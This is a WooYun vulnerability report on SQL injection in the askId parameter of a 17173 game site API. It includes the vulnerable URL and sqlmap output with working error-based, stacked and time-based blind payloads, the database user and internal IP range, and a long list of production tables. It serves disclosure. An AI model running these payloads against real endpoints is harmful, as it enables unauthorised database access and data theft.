17173游戏某API接口存在SQL注入 | wooyun-2015-0142436| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0142436

漏洞标题：17173游戏某API接口存在SQL注入

漏洞作者：路人甲

提交时间：2015-09-21 12:23

修复时间：2015-11-05 14:26

公开时间：2015-11-05 14:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-21：细节已通知厂商并且等待厂商处理中
2015-09-21：厂商已经确认，细节仅向厂商公开
2015-10-01：细节向核心白帽子及相关领域专家公开
2015-10-11：细节向普通白帽子公开
2015-10-21：细节向实习白帽子公开
2015-11-05：细节向公众公开

简要描述：

某API接口存在注入！~~~

详细说明：

抓包过程中发现一个链接，是API接口的，然后测试了一下，发现存在注入！~~~

http://api.bk.17173.com/api/questionDetail/more?
callback=detailCallback1423129370507&_=1442715151407&format=jsonp&callback=jQuery21105332581832657848_1442715151
406&askId=964305&uid=+&askstatus=2&contain_id=194&gameCode=43&pageSize=10&page=hall&pageIndex=1

askId存在注入

http://m.bk.17173.com/question/detail?askid=1015756&from=mobile&classid=1009568

这里的askid已经修复了，但是API接口的却没有修复！~~~

sqlmap identified the following injection points with a total of 1021 HTTP(s) re
quests:
---
Place: GET
Parameter: askId
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=detailCallback1423129370507&_=1442715151407&format=jsonp&c
allback=jQuery21105332581832657848_1442715151406&askId=964305 AND (SELECT 2974 F
ROM(SELECT COUNT(*),CONCAT(0x71726a6b71,(SELECT (CASE WHEN (2974=2974) THEN 1 EL
SE 0 END)),0x71647a6c71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SET
S GROUP BY x)a)&uid= &askstatus=2&contain_id=194&gameCode=43&pageSize=10&page=ha
ll&pageIndex=1
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: callback=detailCallback1423129370507&_=1442715151407&format=jsonp&c
allback=jQuery21105332581832657848_1442715151406&askId=964305; SELECT SLEEP(5)--
 &uid= &askstatus=2&contain_id=194&gameCode=43&pageSize=10&page=hall&pageIndex=1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: callback=detailCallback1423129370507&_=1442715151407&format=jsonp&c
allback=jQuery21105332581832657848_1442715151406&askId=964305 AND SLEEP(5)&uid=
&askstatus=2&contain_id=194&gameCode=43&pageSize=10&page=hall&pageIndex=1
---
[11:04:42] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.27
back-end DBMS: MySQL 5.0
[11:04:42] [INFO] fetching current user
[11:04:43] [INFO] retrieved: newbaike@10.59.107.%
current user:    'newbaike@10.59.107.%'
[11:04:43] [INFO] fetching current database
[11:04:43] [INFO] retrieved: newbk
current database:    'newbk'
[11:04:43] [INFO] testing if current user is DBA
[11:04:43] [INFO] fetching current user
current user is DBA:    False
[11:07:30] [INFO] testing MySQL
[11:07:30] [INFO] heuristics detected web page charset 'utf-8'
[11:07:30] [INFO] confirming MySQL
[11:07:30] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.27
back-end DBMS: MySQL >= 5.0.0
[11:07:30] [INFO] fetching database users
[11:07:30] [INFO] the SQL query used returns 1 entries
[11:07:31] [INFO] retrieved: 'newbaike'@'10.59.107.%'
database management system users [1]:
[*] 'newbaike'@'10.59.107.%'
[11:07:56] [INFO] testing MySQL
[11:07:56] [INFO] confirming MySQL
[11:07:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.27
back-end DBMS: MySQL >= 5.0.0
[11:07:56] [INFO] fetching database names
[11:07:56] [INFO] heuristics detected web page charset 'utf-8'
[11:07:56] [INFO] the SQL query used returns 2 entries
[11:07:56] [INFO] starting 2 threads
[11:07:56] [INFO] retrieved: newbk
[11:07:56] [INFO] retrieved: information_schema
available databases [2]:
[*] information_schema
[*] newbk
Database: newbk
[1823 tables]
+----------------------+
| act_info             |
| actcfg_info          |
| admin_log            |
| at_info              |
| bad_info             |
| bk_sys_log           |
| collect_detail       |
| collect_log          |
| comment              |
| del_answerinfo       |
| del_result           |
| email_queue          |
| error_info           |
| expire_answerinfo    |
| feedback             |
| game_class           |
| game_class_bak2014   |
| hits_count           |
| hot_rank             |
| hot_rank_prev        |
| interview_config     |
| interview_userinfo   |
| join_actinfo         |
| manager_list         |
| manager_list_bak     |
| notify_list          |
| notify_list_bak      |
| nsolve_answerinfo    |
| question_vote        |
| repeal_answerinfo    |
| report_info          |
| result_1000029       |
| result_1000035       |
| result_1000037       |
| result_1000039       |
| result_1000046       |
| result_1000067       |
| result_1000073       |
| result_1000087       |
| result_1000089       |
| result_1000091       |
| result_1000094       |
| result_1000096       |
| result_1000098       |
| result_1000105       |
| result_1000106       |
| result_1000107       |
| result_1000109       |
| result_1000110       |
| result_1000125       |
| result_1000131       |
| result_1000132       |
| result_1000134       |
| result_1000141       |
| result_1000142       |
| result_1000144       |
| result_1000147       |
| result_1000156       |
| result_1000159       |
| result_1000161       |
| result_1000167       |
| result_1000172       |
| result_1000179       |
| result_1000180       |
| result_1000181       |
| result_1000188       |
| result_1000195       |
| result_1000198       |
| result_1000199       |
| result_1000201       |
| result_1000212       |
| result_1000216       |
| result_1000220       |
| result_1000225       |
| result_1000226       |
| result_1000227       |
| result_1000229       |
| result_1000231       |
| result_1000232       |
| result_1000233       |
| result_1000239       |
| result_1000244       |
| result_1000245       |
| result_1000246       |
| result_1000247       |
| result_1000250       |
| result_1000253       |
| result_1000254       |
| result_1000255       |
| result_1000257       |
| result_1000260       |
| result_1000263       |
| result_1000266       |
| result_1000267       |
| result_1000269       |
| result_1000275       |
| result_1000279       |
| result_1000281       |
| result_1000282       |
| result_1000283       |
| result_1000288       |
| result_1000290       |
| result_1000295       |
| result_1000296       |
| result_1000298       |
| result_1000304       |
| result_1000306       |
| result_1000308       |
| result_1000310       |
| result_1000312       |
| result_1000313       |
| result_1000316       |
| result_1000318       |
| result_1000325       |
| result_1000327       |
| result_1000329       |
| result_1000331       |
| result_1000338       |
| result_1000347       |
| result_1000349       |
| result_1000353       |
| result_1000355       |
| result_1000358       |
| result_1000370       |
| result_1000375       |
| result_1000380       |
| result_1000385       |
| result_1000387       |
| result_1000388       |
| result_1000391       |
| result_1000394       |
| result_1000395       |
| result_1000396       |
| result_1000402       |
| result_1000403       |
| result_1000405       |
| result_1000406       |
| result_1000407       |
| result_1000408       |
| result_1000409       |
| result_1000410       |
| result_1000414       |
| result_1000418       |
| result_1000419       |
| result_1000421       |
| result_1000422       |
| result_1000425       |
| result_1000426       |
| result_1000430       |
| result_1000431       |
| result_1000436       |
| result_1000437       |
| result_1000439       |
| result_1000442       |
| result_1000443       |
| result_1000447       |
| result_1000452       |
| result_1000453       |
| result_1000456       |
| result_1000457       |
| result_1000458       |
| result_1000494       |
| result_1000497       |
| result_1000504       |
| result_1000505       |
| result_1000509       |
| result_1000522       |
| result_1000527       |
| result_1000529       |
| result_1000531       |
| result_1000534       |
| result_1000537       |
| result_1000538       |
| result_1000540       |
| result_1000541       |
| result_1000545       |
| result_1000552       |
| result_1000554       |
| result_1000555       |
| result_1000558       |
| result_1000560       |
| result_1000561       |
| result_1000563       |
| result_1000564       |
| result_1000565       |
| result_1000567       |
| result_1000568       |
| result_1000569       |
| result_1000570       |
| result_1000571       |
| result_1000572       |
| result_1000573       |
| result_1000578       |
| result_1000579       |
| result_1000581       |
| result_1000583       |
| result_1000586       |
| result_1000597       |
| result_1000598       |
| result_1000599       |
| result_1000607       |
| result_1000609       |
| result_1000614       |
| result_1000616       |
| result_1000619       |
| result_1000621       |
| result_1000622       |
| result_1000623       |
| result_1000627       |
| result_1000629       |
| result_1000633       |
| result_1000634       |
| result_1000639       |
| result_1000641       |
| result_1000643       |
| result_1000645       |
| result_1000648       |
| result_1000649       |
| result_1000650       |
| result_1000651       |
| result_1000652       |
| result_1000653       |
| result_1000654       |
| result_1000655       |
| result_1000656       |
| result_1000657       |
| result_1000659       |
| result_1000660       |
| result_1000661       |
| result_1000664       |
| result_1000665       |
| result_1000666       |
| result_1000667       |
| result_1000668       |
| result_1000670       |
| result_1000671       |
| result_1000674       |
| result_1000675       |
| result_1000677       |
| result_1000679       |
| result_1000680       |
| result_1000681       |
| result_1000683       |
| result_1000684       |
| result_1000688       |
| result_1000689       |
| result_1000691       |
| result_1000692       |
| result_1000696       |
| result_1000699       |
| result_1000704       |
| result_1000705       |
| result_1000706       |
| result_1000707       |
| result_1000709       |
| result_1000710       |
| result_1000712       |
| result_1000716       |
| result_1000717       |
| result_1000719       |
| result_1000722       |
| result_1000723       |
| result_1000724       |
| result_1000725       |
| result_1000727       |
| result_1000728       |
| result_1000729       |
| result_1000731       |
| result_1000733       |
| result_1000734       |
| result_1000737       |
| result_1000738       |
| result_1000740       |
| result_1000741       |
| result_1000744       |
| result_1000745       |
| result_1000747       |
| result_1000748       |
| result_1000750       |
| result_1000752       |
| result_1000755       |
| result_1000757       |
| result_1000758       |
| result_1000759       |
| result_1000763       |
| result_1000766       |
| result_1000767       |
| result_1000768       |
| result_1000769       |
| result_1000771       |
| result_1000772       |
| result_1000773       |
| result_1000776       |
| result_1000777       |
| result_1000778       |
| result_1000779       |
| result_1000780       |
| result_1000782       |
| result_1000783       |
| result_1000784       |
| result_1000785       |
| result_1000786       |
| result_1000787       |
| result_1000789       |
| result_1000790       |
| result_1000791       |
| result_1000793       |
| result_1000794       |
| result_1000797       |
| result_1000798       |
| result_1000799       |
| result_1000800       |
| result_1000801       |
| result_1000802       |
| result_1000806       |
| result_1000807       |
| result_1000808       |
| result_1000809       |
| result_1000811       |
| result_1000812       |
| result_1000813       |
| result_1000814       |
| result_1000815       |
| result_1000818       |
| result_1000819       |
| result_1000820       |
| result_1000822       |
| result_1000823       |
| result_1000824       |
| result_1000825       |
| result_1000826       |
| result_1000833       |
| result_1000834       |
| result_1000835       |
| result_1000836       |
| result_1000837       |
| result_1000838       |
| result_1000840       |
| result_1000841       |
| result_1000842       |
| result_1000843       |
| result_1000844       |
| result_1000845       |
| result_1000846       |
| result_1000847       |
| result_1000848       |
| result_1000850       |
| result_1000851       |
| result_1000852       |
| result_1000853       |
| result_1000854       |
| result_1000855       |
| result_1000856       |
| result_1000857       |
| result_1000858       |
| result_1000861       |
| result_1000862       |
| result_1000863       |
| result_1000864       |
| result_1000866       |
| result_1000867       |
| result_1000869       |
| result_1000870       |
| result_1000871       |
| result_1000872       |
| result_1000873       |
| result_1000874       |
| result_1000875       |
| result_1000876       |
| result_1000878       |
| result_1000880       |
| result_1000881       |
| result_1000882       |
| result_1000883       |
| result_1000886       |
| result_1000890       |
| result_1000891       |
| result_1000894       |
| result_1000895       |
| result_1000896       |
| result_1000897       |
| result_1000898       |
| result_1000899       |
| result_1000900       |
| result_1000903       |
| result_1000904       |
| result_1000905       |
| result_1000907       |
| result_1000908       |
| result_1000909       |
| result_1000910       |
| result_1000912       |
| result_1000913       |
| result_1000915       |
| result_1000916       |
| result_1000917       |
| result_1000918       |
| result_1000919       |
| result_1000920       |
| result_1000922       |
| result_1000924       |
| result_1000925       |
| result_1000926       |
| result_1000927       |
| result_1000928       |
| result_1000929       |
| result_1000931       |
| result_1000932       |
| result_1000933       |
| result_1000934       |
| result_1000935       |
| result_1000936       |
| result_1000937       |
| result_1000938       |
| result_1000939       |
| result_1000941       |
| result_1000944       |
| result_1000945       |
| result_1000946       |
| result_1000947       |
| result_1000948       |
| result_1000949       |
| result_1000950       |
| result_1000951       |
| result_1000952       |
| result_1000953       |
| result_1000954       |
| result_1000955       |
| result_1000956       |
| result_1000957       |
| result_1000959       |
| result_1000960       |
| result_1000961       |
| result_1000962       |
| result_1000963       |
| result_1000966       |
| result_1000967       |
| result_1000968       |
| result_1000969       |
| result_1000970       |
| result_1000971       |
| result_1000972       |
| result_1000973       |
| result_1000976       |
| result_1000978       |
| result_1000979       |
| result_1000987       |
| result_1000988       |
| result_1000995       |
| result_1000997       |
| result_1000999       |
| result_1001000       |
| result_1001001       |
| result_1001002       |
| result_1001003       |
| result_1001004       |
| result_1001005       |
| result_1001006       |
| result_1001007       |
| result_1001009       |
| result_1001011       |
| result_1001012       |
| result_1001013       |
| result_1001015       |
| result_1001016       |
| result_1001017       |
| result_1001018       |
| result_1001019       |
| result_1001021       |
| result_1001022       |
| result_1001023       |
| result_1001024       |
| result_1001025       |
| result_1001027       |
| result_1001028       |
| result_1001029       |
| result_1001031       |
| result_1001032       |
| result_1001033       |
| result_1001034       |
| result_1001035       |
| result_1001036       |
| result_1001037       |
| result_1001038       |
| result_1001039       |
| result_1001040       |
| result_1001041       |
| result_1001042       |
| result_1001046       |
| result_1001047       |
| result_1001048       |
| result_1001049       |
| result_1001050       |
| result_1001052       |
| result_1001054       |
| result_1001055       |
| result_1001056       |
| result_1001057       |
| result_1001058       |
| result_1001060       |
| result_1001061       |
| result_1001062       |
| result_1001064       |
| result_1001065       |
| result_1001066       |
| result_1001068       |
| result_1001069       |
| result_1001070       |
| result_1001071       |
| result_1001072       |
| result_1001073       |
| result_1001074       |
| result_1001077       |
| result_1001079       |
| result_1001080       |
| result_1001081       |
| result_1001082       |
| result_1001083       |
| result_1001084       |
| result_1001085       |
| result_1001086       |
| result_1001087       |
| result_1001089       |
| result_1001091       |
| result_1001092       |
| result_1001094       |
| result_1001097       |
| result_1001098       |
| result_1001099       |
| result_1001100       |
| result_1001101       |
| result_1001104       |
| result_1001105       |
| result_1001106       |
| result_1001107       |
| result_1001109       |
| result_1001110       |
| result_1001111       |
| result_1001115       |
| result_1001116       |
| result_1001117       |
| result_1001118       |
| result_1001119       |
| result_1001128       |
| result_1001129       |
| result_1001130       |
| result_1001133       |
| result_1001134       |
| result_1001135       |
| result_1001138       |
| result_1001139       |
| result_1001140       |
| result_1001141       |
| result_1001143       |
| result_1001144       |
| result_1001147       |
| result_1001148       |
| result_1001149       |
| result_1001150       |
| result_1001151       |
| result_1001152       |
| result_1001153       |
| result_1001154       |
| result_1001155       |
| result_1001156       |
| result_1001157       |
| result_1001158       |
| result_1001159       |
| result_1001160       |
| result_1001161       |
| result_1001162       |
| result_1001163       |
| result_1001164       |
| result_1001167       |
| result_1001169       |
| result_1001170       |
| result_1001171       |
| result_1001173       |
| result_1001174       |
| result_1001175       |
| result_1001176       |
| result_1001177       |
| result_1001180       |
| result_1001181       |
| result_1001182       |
| result_1001183       |
| result_1001184       |
| result_1001185       |
| result_1001186       |
| result_1001187       |
| result_1001189       |
| result_1001191       |
| result_1001192       |
| result_1001193       |
| result_1001194       |
| result_1001195       |
| result_1001196       |
| result_1001198       |
| result_1001199       |
| result_1001200       |
| result_1001201       |
| result_1001202       |
| result_1001204       |
| result_1001205       |
| result_1001206       |
| result_1001208       |
| result_1001209       |
| result_1001213       |
| result_1001214       |
| result_1001215       |
| result_1001216       |
| result_1001218       |
| result_1001220       |
| result_1001221       |
| result_1001222       |
| result_1001223       |
| result_1001224       |
| result_1001225       |
| result_1001226       |
| result_1001228       |
| result_1001229       |
| result_1001230       |
| result_1001231       |
| result_1001233       |
| result_1001234       |
| result_1001235       |
| result_1001236       |
| result_1001237       |
| result_1001239       |
| result_1001240       |
| result_1001241       |
| result_1001242       |
| result_1001243       |
| result_1001244       |
| result_1001245       |
| result_1001246       |
| result_1001247       |
| result_1001249       |
| result_1001250       |
| result_1001251       |
| result_1001252       |
| result_1001253       |
| result_1001255       |
| result_1001257       |
| result_1001259       |
| result_1001260       |
| result_1001261       |
| result_1001262       |
| result_1001263       |
| result_1001264       |
| result_1001265       |
| result_1001267       |
| result_1001269       |
| result_1001270       |
| result_1001271       |
| result_1001272       |
| result_1001273       |
| result_1001274       |
| result_1001281       |
| result_1001283       |
| result_1001284       |
| result_1001286       |
| result_1001287       |
| result_1001288       |
| result_1001289       |
| result_1001292       |
| result_1001293       |
| result_1001294       |
| result_1001299       |
| result_1001302       |
| result_1001303       |
| result_1001304       |
| result_1001306       |
| result_1001307       |
| result_1001308       |
| result_1001310       |
| result_1001311       |
| result_1001313       |
| result_1001315       |
| result_1001317       |
| result_1001318       |
| result_1001320       |
| result_1001322       |
| result_1001324       |
| result_1001325       |
| result_1001326       |
| result_1001327       |
| result_1001328       |
| result_1001329       |
| result_1001330       |
| result_1001331       |
| result_1001332       |
| result_1001333       |
| result_1001334       |
| result_1001335       |
| result_1001336       |
| result_1001337       |
| result_1001338       |
| result_1001343       |
| result_1001344       |
| result_1001345       |
| result_1001346       |
| result_1001347       |
| result_1001348       |
| result_1001350       |
| result_1001351       |
| result_1001354       |
| result_1001358       |
| result_1001360       |
| result_1001361       |
| result_1001363       |
| result_1001364       |
| result_1001365       |
| result_1001368       |
| result_1001369       |
| result_1001370       |
| result_1001371       |
| result_1001372       |
| result_1001373       |
| result_1001375       |
| result_1001376       |
| result_1001378       |
| result_1001379       |
| result_1001380       |
| result_1001381       |
| result_1001383       |
| result_1001384       |
| result_1001385       |
| result_1001386       |
| result_1001387       |
| result_1001400       |
| result_1001401       |
| result_1001403       |
| result_1001405       |
| result_1001406       |
| result_1001408       |
| result_1001409       |
| result_1001410       |
| result_1001412       |
| result_1001413       |
| result_1001415       |
| result_1001416       |
| result_1001417       |
| result_1001418       |
| result_1001420       |
| result_1001421       |
| result_1001422       |
| result_1001423       |
| result_1001425       |
| result_1001428       |
| result_1001429       |
| result_1001432       |
| result_1001433       |
| result_1001434       |
| result_1001435       |
| result_1001437       |
| result_1001440       |
| result_1001442       |
| result_1001444       |
| result_1001445       |
| result_1001446       |
| result_1001447       |
| result_1001449       |
| result_1001451       |
| result_1001453       |
| result_1001455       |
| result_1001456       |
| result_1001458       |
| result_1001459       |
| result_1001460       |
| result_1001461       |
| result_1001462       |
| result_1001463       |
| result_1001464       |
| result_1001465       |
| result_1001466       |
| result_1001467       |
| result_1001470       |
| result_1001471       |
| result_1001472       |
| result_1001473       |
| result_1001474       |
| result_1001475       |
| result_1001476       |
| result_1001477       |
| result_1001478       |
| result_1001479       |
| result_1001480       |
| result_1001481       |
| result_1001482       |
| result_1001484       |
| result_1001485       |
| result_1001487       |
| result_1001488       |
| result_1001491       |
| result_1001492       |
| result_1001493       |
| result_1001497       |
| result_1001498       |
| result_1001499       |
| result_1001502       |
| result_1001503       |
| result_1001504       |
| result_1001505       |
| result_1001506       |
| result_1001507       |
| result_1001508       |
| result_1001510       |
| result_1001511       |
| result_1001514       |
| result_1001515       |
| result_1001519       |
| result_1001520       |
| result_1001521       |
| result_1001522       |
| result_1001523       |
| result_1001525       |
| result_1001526       |
| result_1001527       |
| result_1001528       |
| result_1001529       |
| result_1001531       |
| result_1001536       |
| result_1001538       |
| result_1001539       |
| result_1001541       |
| result_1001542       |
| result_1001543       |
| result_1001545       |
| result_1001548       |
| result_1001550       |
| result_1001551       |
| result_1001552       |
| result_1001554       |
| result_1001556       |
| result_1001557       |
| result_1001559       |
| result_1001567       |
| result_1001568       |
| result_1001571       |
| result_1001572       |
| result_1001573       |
| result_1001574       |
| result_1001575       |
| result_1001576       |
| result_1001578       |
| result_1001587       |
| result_1001588       |
| result_1001589       |
| result_1001590       |
| result_1001591       |
| result_1001592       |
| result_1001593       |
| result_1001594       |
| result_1001596       |
| result_1001597       |
| result_1001599       |
| result_1001601       |
| result_1001602       |
| result_1001604       |
| result_1001605       |
| result_1001609       |
| result_1001615       |
| result_1001618       |
| result_1001619       |
| result_1001620       |
| result_1001621       |
| result_1001622       |
| result_1001623       |
| result_1001624       |
| result_1001625       |
| result_1001627       |
| result_1001628       |
| result_1001631       |
| result_1001632       |
| result_1001633       |
| result_1001635       |
| result_1001637       |
| result_1001638       |
| result_1001639       |
| result_1001641       |
| result_1001645       |
| result_1001646       |
| result_1001647       |
| result_1001648       |
| result_1001649       |
| result_1001651       |
| result_1001652       |
| result_1001654       |
| result_1001655       |
| result_1001656       |
| result_1001657       |
| result_1001663       |
| result_1001664       |
| result_1001665       |
| result_1001670       |
| result_1001671       |
| result_1001673       |
| result_1001676       |
| result_1001678       |
| result_1001679       |
| result_1001684       |
| result_1001686       |
| result_1001687       |
| result_1001688       |
| result_1001690       |
| result_1001691       |
| result_1001692       |
| result_1001698       |
| result_1001699       |
| result_1001700       |
| result_1001701       |
| result_1001702       |
| result_1001703       |
| result_1001704       |
| result_1001706       |
| result_1001708       |
| result_1001710       |
| result_1001711       |
| result_1001712       |
| result_1001714       |
| result_1001716       |
| result_1001717       |
| result_1001718       |
| result_1001719       |
| result_1001723       |
| result_1001725       |
| result_1001726       |
| result_1001727       |
| result_1001729       |
| result_1001730       |
| result_1001731       |
| result_1001733       |
| result_1001735       |
| result_1001736       |
| result_1001740       |
| result_1001741       |
| result_1001743       |
| result_1001744       |
| result_1001746       |
| result_1001749       |
| result_1001751       |
| result_1001753       |
| result_1001754       |
| result_1001755       |
| result_1001756       |
| result_1001757       |
| result_1001758       |
| result_1001760       |
| result_1001761       |
| result_1001762       |
| result_1001766       |
| result_1001767       |
| result_1001768       |
| result_1001770       |
| result_1001772       |
| result_1001778       |
| result_1001780       |
| result_1001783       |
| result_1001784       |
| result_1001785       |
| result_1001786       |
| result_1001788       |
| result_1001789       |
| result_1001790       |
| result_1001796       |
| result_1001797       |
| result_1001798       |
| result_1001799       |
| result_1001800       |
| result_1001802       |
| result_1001803       |
| result_1001804       |
| result_1001805       |
| result_1001806       |
| result_1001807       |
| result_1001809       |
| result_1001810       |
| result_1001811       |
| result_1001812       |
| result_1001813       |
| result_1001818       |
| result_1001819       |
| result_1001821       |
| result_1001822       |
| result_1001823       |
| result_1001824       |
| result_1001825       |
| result_1001826       |
| result_1001828       |
| result_1001830       |
| result_1001831       |
| result_1001832       |
| result_1001833       |
| result_1001836       |
| result_1001840       |
| result_1001841       |
| result_1001845       |
| result_1001846       |
| result_1001847       |
| result_1001849       |
| result_1001850       |
| result_1001852       |
| result_1001853       |
| result_1001854       |
| result_1001855       |
| result_1001856       |
| result_1001857       |
| result_1001858       |
| result_1001859       |
| result_1001861       |
| result_1001862       |
| result_1001863       |
| result_1001864       |
| result_1001865       |
| result_1001871       |
| result_1001876       |
| result_1001877       |
| result_1001878       |
| result_1001880       |
| result_1001881       |
| result_1001882       |
| result_1001884       |
| result_1001888       |
| result_1001889       |
| result_1001890       |
| result_1001891       |
| result_1001892       |
| result_1001896       |
| result_1001898       |
| result_1001899       |
| result_1001901       |
| result_1001902       |
| result_1001907       |
| result_1001908       |
| result_1001909       |
| result_1001910       |
| result_1001912       |
| result_1001914       |
| result_1001915       |
| result_1001916       |
| result_1001918       |
| result_1001921       |
| result_1001922       |
| result_1001924       |
| result_1001926       |
| result_1001927       |
| result_1001928       |
| result_1001929       |
| result_1001933       |
| result_1001936       |
| result_1001937       |
| result_1001939       |
| result_1001940       |
| result_1001941       |
| result_1001944       |
| result_1001946       |
| result_1001948       |
| result_1001949       |
| result_1001950       |
| result_1001951       |
| result_1001952       |
| result_1001953       |
| result_1001955       |
| result_1001956       |
| result_1001957       |
| result_1001958       |
| result_1001959       |
| result_1001960       |
| result_1001962       |
| result_1001963       |
| result_1001964       |
| result_1001967       |
| result_1001969       |
| result_1001970       |
| result_1001972       |
| result_1001973       |
| result_1001975       |
| result_1001977       |
| result_1001978       |
| result_1001980       |
| result_1001981       |
| result_1001982       |
| result_1001983       |
| result_1001985       |
| result_1001986       |
| result_1001987       |
| result_1001988       |
| result_1001989       |
| result_1001991       |
| result_1001992       |
| result_1001993       |
| result_1001996       |
| result_1001997       |
| result_1001998       |
| result_1002000       |
| result_1002001       |
| result_1002002       |
| result_1002003       |
| result_1002004       |
| result_1002006       |
| result_1002008       |
| result_1002010       |
| result_1002011       |
| result_1002012       |
| result_1002013       |
| result_1002014       |
| result_1002015       |
| result_1002016       |
| result_1002017       |
| result_1002020       |
| result_1002022       |
| result_1002023       |
| result_1002025       |
| result_1002026       |
| result_1002027       |
| result_1002028       |
| result_1002029       |
| result_1002030       |
| result_1002034       |
| result_1002036       |
| result_1002037       |
| result_1002040       |
| result_1002041       |
| result_1002042       |
| result_1002043       |
| result_1002044       |
| result_1002046       |
| result_1002048       |
| result_1002050       |
| result_1002051       |
| result_1002052       |
| result_1002053       |
| result_1002054       |
| result_1002056       |
| result_1002059       |
| result_1002060       |
| result_1002064       |
| result_1002066       |
| result_1002068       |
| result_1002069       |
| result_1002070       |
| result_1002071       |
| result_1002082       |
| result_1002156       |
| result_1002182       |
| result_1002239       |
| result_1002297       |
| result_1002313       |
| result_1002319       |
| result_1002335       |
| result_1002336       |
| result_1002474       |
| result_1002483       |
| result_1002499       |
| result_1002518       |
| result_1002521       |
| result_1002540       |
| result_1002543       |
| result_1002546       |
| result_1002575       |
| result_1002581       |
| result_1002599       |
| result_1002603       |
| result_1002617       |
| result_1002618       |
| result_1002619       |
| result_1002623       |
| result_1002631       |
| result_1002632       |
| result_1002636       |
| result_1002637       |
| result_1002640       |
| result_1002642       |
| result_1002644       |
| result_1002645       |
| result_1002647       |
| result_1002650       |
| result_1002651       |
| result_1002654       |
| result_1002658       |
| result_1002662       |
| result_1002663       |
| result_1002667       |
| result_1002673       |
| result_1002675       |
| result_1002680       |
| result_1002689       |
| result_1002690       |
| result_1002691       |
| result_1002692       |
| result_1002694       |
| result_1002701       |
| result_1002703       |
| result_1002704       |
| result_1002706       |
| result_1002707       |
| result_1002710       |
| result_1002713       |
| result_1002719       |
| result_1002720       |
| result_1002721       |
| result_1002727       |
| result_1002729       |
| result_1002731       |
| result_1002735       |
| result_1002736       |
| result_1002743       |
| result_1002748       |
| result_1002751       |
| result_1002752       |
| result_1002754       |
| result_1002755       |
| result_1002758       |
| result_1002759       |
| result_1002760       |
| result_1002767       |
| result_1002769       |
| result_1002770       |
| result_1002772       |
| result_1002775       |
| result_1002776       |
| result_1002780       |
| result_1002787       |
| result_1002788       |
| result_1002791       |
| result_1002795       |
| result_1002796       |
| result_1002798       |
| result_1002799       |
| result_1002806       |
| result_1002811       |
| result_1002820       |
| result_1002828       |
| result_1002835       |
| result_1002839       |
| result_1002840       |
| result_1002842       |
| result_1002844       |
| result_1002845       |
| result_1002850       |
| result_1002852       |
| result_1002853       |
| result_1002854       |
| result_1002860       |
| result_1002862       |
| result_1002863       |
| result_1002864       |
| result_1002867       |
| result_1002870       |
| result_1002871       |
| result_1002873       |
| result_1002874       |
| result_1002880       |
| result_1002881       |
| result_1002883       |
| result_1002884       |
| result_1002886       |
| result_1002887       |
| result_1002891       |
| result_1002893       |
| result_1002895       |
| result_1002898       |
| result_1002901       |
| result_1002904       |
| result_1002910       |
| result_1002912       |
| result_1002913       |
| result_1002926       |
| result_1002927       |
| result_1002936       |
| result_1002939       |
| result_1002940       |
| result_1002941       |
| result_1002943       |
| result_1002951       |
| result_1002959       |
| result_1002960       |
| result_1002962       |
| result_1002963       |
| result_1002966       |
| result_1002967       |
| result_1002970       |
| result_1002974       |
| result_1002981       |
| result_1002982       |
| result_1002988       |
| result_1003001       |
| result_1003003       |
| result_1003010       |
| result_1003012       |
| result_1003014       |
| result_1003019       |
| result_1003029       |
| result_1003030       |
| result_1003031       |
| result_1003032       |
| result_1003034       |
| result_1003041       |
| result_1003043       |
| result_1003044       |
| result_1003048       |
| result_1003063       |
| result_1003066       |
| result_1003074       |
| result_1003077       |
| result_1003082       |
| result_1003086       |
| result_1003089       |
| result_1003094       |
| result_1003095       |
| result_1003097       |
| result_1003098       |
| result_1003104       |
| result_1003106       |
| result_1003113       |
| result_1003115       |
| result_1003124       |
| result_1003129       |
| result_1003130       |
| result_1003132       |
| result_1003133       |
| result_1003136       |
| result_1003138       |
| result_1003140       |
| result_1003141       |
| result_1003143       |
| result_1003148       |
| result_1003151       |
| result_1003156       |
| result_1003169       |
| result_1003172       |
| result_1003178       |
| result_1003181       |
| result_1003182       |
| result_1003187       |
| result_1003190       |
| result_1003191       |
| result_1003195       |
| result_1003196       |
| result_1003199       |
| result_1003203       |
| result_1003205       |
| result_1003208       |
| result_1003209       |
| result_1003216       |
| result_1003217       |
| result_1003220       |
| result_1003225       |
| result_1003232       |
| result_1003234       |
| result_1003235       |
| result_1003238       |
| result_1003242       |
| result_1003244       |
| result_1003245       |
| result_1003247       |
| result_1003248       |
| result_1003250       |
| result_1003254       |
| result_1003259       |
| result_1003261       |
| result_1003263       |
| result_1003281       |
| result_1003288       |
| result_1003300       |
| result_1003304       |
| result_1003309       |
| result_1003314       |
| result_1003316       |
| result_1003318       |
| result_1003322       |
| result_1003323       |
| result_1003325       |
| result_1003329       |
| result_1003334       |
| result_1003335       |
| result_1003339       |
| result_1003351       |
| result_1003352       |
| result_1003354       |
| result_1003355       |
| result_1003356       |
| result_1003357       |
| result_1003358       |
| result_1003359       |
| result_1003642       |
| result_1003643       |
| result_1004881       |
| result_1005565       |
| result_1005571       |
| result_1005572       |
| result_1005573       |
| result_1005574       |
| result_1005575       |
| result_1005607       |
| result_1005608       |
| result_1005713       |
| result_1006189       |
| result_1006276       |
| result_1006280       |
| result_1006281       |
| result_1006314       |
| result_1006345       |
| result_1006347       |
| result_1006349       |
| result_1006351       |
| result_1006484       |
| result_1006492       |
| result_1006493       |
| result_1006495       |
| result_1006496       |
| result_1006498       |
| result_1006499       |
| result_1006500       |
| result_1006501       |
| result_1006505       |
| result_1006508       |
| result_1006511       |
| result_1008781       |
| result_1008782       |
| result_1009390       |
| result_1009402       |
| result_1009405       |
| result_1009406       |
| result_1009408       |
| result_1009410       |
| result_1009412       |
| result_1009415       |
| result_1009418       |
| result_1009423       |
| result_1009424       |
| result_1009431       |
| result_1009432       |
